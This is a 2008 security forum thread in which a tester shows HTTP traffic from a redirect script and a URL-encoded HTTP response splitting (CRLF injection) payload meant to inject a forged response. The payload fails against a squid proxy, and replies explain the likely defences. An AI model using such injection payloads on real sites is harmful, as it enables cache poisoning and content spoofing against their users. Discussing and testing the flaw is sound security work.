Hey together,

i'm new to this community although i often visited ha.ckers.org.

I got a webapp which i should look for webapp vulns. I need to do blackbox-testing and i found some xss plus some sql injections.

Then i found this one:

foo.bar/accept?dest=/xy/z

This looks like a redir-script, right? So this is what i get:



GET foo.bar/accept?dest=/xy/z HTTP/1.1
Host: foo.barUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Pragma: no-cache
Proxy-Connection: keep-alive

HTTP/1.x 302 Moved Temporarily <<<<<< look suspicious
Via: A_PROXY
Connection: close
Proxy-Connection: close
Date: Fri, 25 Apr 2008 12:09:42 GMT
Location: foo.bar/xy/z <<<<<<<
Content-Type: text/html; charset=utf-8
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d
Cache-Control: no-cache, private
X-Runtime: 0.39293
X-Powered-By: Servlet/2.4 JSP/2.0
X-Cache: MISS from prx-deka-02.f.ddk
----------------------------------------------------------
GET /xy/z HTTP/1.1 <<<<< thats it, right?
Host: foo.bar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
If-None-Match: "e7346ba9885de32fe8d51358b8a409af"

HTTP/1.x 304 Not Modified <<<<< comes straight from a squid proxy
Via: A_PROXY
Date: Fri, 25 Apr 2008 12:09:42 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d
Etag: "e7346ba9885de32fe8d51358b8a409af"
Cache-Control: private, max-age=0, must-revalidate, private
X-Cache: MISS from A_PROXY


Till now evrything looks like a response splitting flaw. Thats why i pass this one to $dest:



/xy/z/4%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aPragma:%20no-cache%0d%0aLast-Modified:%20Tue,%2015%20Nov%202055%2012:45:26%20GMT%0d%0aContent-Length:%2036%0d%0a%3Chtml%3EHTTP%20Response%20Splitting%3C/html%3E

Which is:

/xy/z

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: no-cache
Last-Modified: Tue, 15 Nov 2055 12:45:26 GMT
Content-Length: 36
<html>HTTP Response Splitting</html>



So, again our http traffic now with a injected http header:




GET /accept?dest=/xy/z/4%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aPragma:%20no-cache%0d%0aLast-Modified:%20Tue,%2015%20Nov%202055%2012:45:26%20GMT%0d%0aContent-Length:%2036%0d%0a%3Chtml%3EHTTP%20Response%20Splitting%3C/html%3E HTTP/1.1
Host: foo.bar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Pragma: no-cache
Proxy-Connection: keep-alive

HTTP/1.x 302 Moved Temporarily
Via: A_PROXY
Connection: close
Proxy-Connection: close
Date: Fri, 25 Apr 2008 12:07:47 GMT
Location: foo.bar/de/xy/z
Content-Type: text/html; charset=utf-8
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d
Cache-Control: no-cache, private
X-Powered-By: Servlet/2.4 JSP/2.0
X-Cache: MISS from A_PROXY
----------------------------------------------------------
GET /xy/z HTTP/1.1
Host: foo.bar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
If-None-Match: "78ad90f3569fd7b31ad763f3f52e2c46"

HTTP/1.x 304 Not Modified
Via: 1.0 A_PROXY
Date: Fri, 25 Apr 2008 12:07:48 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d
Etag: "78ad90f3569fd7b31ad763f3f52e2c46"
Cache-Control: private, max-age=0, must-revalidate, private
X-Cache: MISS A_PROXY


As u can see, the injected header won't be matched to the http-request from the redir-script.

I tried several crlf-types: %0d%0a , %0a%0a and %0a but as we can see this is a linuxbox therefore %0d%0a should work.

There's a squid between me and foo.bar. The whitepaper from sanctum sais that squid has a packet boundary approach and messages are read as packets and therefore injected headers may need 2 be padded.

Some1 can help me out?

Thx

And another question:

If a website usilizes user-input to form an address the user gets redericted to (by sending a http 302 header), is there always the risc of http response splitting?

If not, what are the conditions influencing the scenario? How can one manipulate and detect them?

Cheers

In response to your question about websites utilizing user-input I am going to say, "no". One of the scenarios where response splitting will not work would be if the website is using PHP 5 (I believe), which supposedly fixed the issue.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

As to the original question: I see basically two reasons why response splitting wouldn't work.

1. This isn't really a redirect to the page you are passing in the parameter, the script always redirects to a fixed URL ignoring the input.
2. There is some validation and the script will ignore URL parts following a special character.

You can find out which one is true by doing further experimenting. But either way, most likely you loose. HTTP response splitting is extremely easy to protect against, if the site has any countermeasures for it those are usually water-proof.



Edited 2 time(s). Last edit at 05/07/2008 05:13PM by trev.